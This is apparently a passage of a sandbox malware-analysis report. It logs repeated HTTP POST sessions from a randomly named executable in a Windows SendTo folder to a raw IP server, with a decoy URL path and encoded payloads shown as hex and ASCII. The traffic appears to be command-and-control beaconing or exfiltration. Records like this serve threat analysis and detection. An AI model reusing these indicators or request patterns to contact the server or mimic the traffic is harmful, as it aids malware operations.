                                          74 | 192.168.2.4 | 56744 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:44.931591034 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:45.671010017 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:45.801625967 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:45 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          75 | 192.168.2.4 | 56745 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:45.944906950 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:46.689307928 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:46.842910051 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:46 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          76 | 192.168.2.4 | 56746 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:46.982783079 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:47.717782021 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:47.870826960 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:47 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          77 | 192.168.2.4 | 56747 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:48.287765980 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          78 | 192.168.2.4 | 56748 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:48.343519926 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2084
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:49.088601112 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:49.219090939 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:48 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          79 | 192.168.2.4 | 56749 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:48.562556982 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:49.300360918 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:49.453161955 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:49 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          80 | 192.168.2.4 | 56750 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:49.600754023 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:50.369389057 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:50.535459042 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:50 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          81 | 192.168.2.4 | 56751 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:51.101450920 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:51.843934059 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:51.972672939 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:51 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          82 | 192.168.2.4 | 56752 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:52.107944012 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:52.906841040 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:53.041019917 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:52 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          83 | 192.168.2.4 | 56753 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:53.169855118 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:54.855592966 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:54.856364965 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:53 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Sep 13, 2024 21:03:54.856744051 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:53 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:54.858067036 CEST  225  IN  HTTP/1.1 100 Continue
                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 33 20 53 65 70 20 32 30 32 34 20 31 39 3a 30 33 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Sep 2024 19:03:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4?V@Z0
                                          Sep 13, 2024 21:03:54.860810041 CEST  225  IN  HTTP/1.1 100 Continue
                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 33 20 53 65 70 20 32 30 32 34 20 31 39 3a 30 33 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Sep 2024 19:03:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          84          192.168.2.4  56754        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:54.865626097 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:55.223128080 CEST  2108  OUT  Data Raw: 5b 52 43 50 55 45 5c 51 59 5f 51 51 52 5f 54 55 5a 5c 5a 59 55 57 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RCPUE\QY_QQR_TUZ\ZYUWSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:*/6X#=X 3=]*(9?<5X=;;?3?&)<%,<X1;9[&!^-;
                                          Sep 13, 2024 21:03:55.607487917 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:55.772758961 CEST  349  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:55 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0f 29 36 33 56 27 28 3b 54 2c 03 0c 50 26 2c 20 5c 28 1d 03 41 2b 03 15 01 2c 2a 2a 58 27 3b 31 11 30 2c 27 11 27 3c 2c 09 3d 3a 2e 46 0d 1d 26 06 3d 06 3f 0d 3e 10 3c 11 27 2d 31 58 34 09 20 04 24 11 01 1c 37 05 3e 12 23 31 23 11 26 2a 3e 01 2f 0b 2d 06 2a 08 32 59 20 0c 2e 55 0f 15 39 14 26 22 25 08 28 32 3c 06 2a 2c 35 0f 25 06 23 56 27 38 3f 0a 27 2b 25 0d 25 01 0f 1f 25 31 27 5b 2a 2d 2a 0e 35 0f 0f 0f 22 11 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:)63V'(;T,P&, \(A+,**X';10,''<,=:.F&=?><'-1X4 $7>#1#&*>/-*2Y .U9&"%(2<*,5%#V'8?'+%%%1'[*-*5"'T#(V3YT0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          85          192.168.2.4  56755        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:54.865748882 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:55.223268032 CEST  2528  OUT  Data Raw: 5b 5f 43 55 50 43 59 5d 59 5f 51 51 52 59 54 50 5a 52 5a 5f 55 5e 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_CUPCY]Y_QQRYTPZRZ_U^S@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(Y1#2%4=*6V<")^4V<,*00/1C13&+9[&!^-/
                                          Sep 13, 2024 21:03:55.608974934 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:55.793765068 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:55 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          86          192.168.2.4  56756        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:55.953028917 CEST  554  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:56.301549911 CEST  2532  OUT  Data Raw: 5e 52 43 56 55 45 59 5c 59 5f 51 51 52 58 54 5a 5a 52 5a 5f 55 57 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RCVUEY\Y_QQRXTZZRZ_UWSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+,) 21_46>;9?%^=3+Z"Z$072\(2'%+9[&!^-'
                                          Sep 13, 2024 21:03:56.710599899 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:56.866528034 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:56 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          87          192.168.2.4  56757        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:57.040509939 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:57.394980907 CEST  2532  OUT  Data Raw: 5e 53 43 53 55 46 5c 57 59 5f 51 51 52 58 54 5a 5a 52 5a 59 55 5e 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^SCSUF\WY_QQRXTZZRZYU^SDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(,.Z#6 #)=+:?_)+(U(,:]0+29+B1?+1;9[&!^-'
                                          Sep 13, 2024 21:03:57.773118019 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:57.927632093 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:57 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          88          192.168.2.4  56758        31.177.108.211  80                8036  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          Sep 13, 2024 21:03:58.058023930 CEST  578  OUT  POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:58.410717964 CEST  2532  OUT  Data Raw: 5b 51 43 5f 55 44 5c 57 59 5f 51 51 52 51 54 56 5a 5a 5a 5d 55 52 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [QC_UD\WY_QQRQTVZZZ]URSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9?/*Z#15##-X((-?)>(,"]%3?&9+D%? &;9[&!^-
                                          Sep 13, 2024 21:03:58.791119099 CEST  25  IN  HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:58.944931984 CEST  200  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:58 GMT
                                          Content-Type: text/html; charset=UTF-8
